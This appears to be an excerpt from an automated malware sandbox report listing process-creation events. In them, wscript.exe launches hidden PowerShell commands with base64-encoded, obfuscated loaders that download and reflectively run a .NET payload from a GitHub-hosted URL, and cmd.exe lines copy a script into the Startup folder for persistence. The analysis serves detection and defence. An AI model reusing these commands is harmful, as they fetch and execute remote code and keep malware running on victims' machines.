Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGU